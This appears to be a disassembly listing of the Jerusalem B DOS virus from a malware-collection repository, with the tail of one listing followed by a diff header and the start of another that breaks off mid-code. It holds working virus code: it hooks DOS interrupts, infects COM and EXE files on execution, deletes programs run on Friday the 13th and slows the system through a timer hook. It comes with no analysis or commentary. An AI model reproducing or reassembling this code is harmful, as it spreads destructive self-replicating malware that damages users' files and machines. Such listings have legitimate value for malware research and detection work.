0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jeru.lst
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
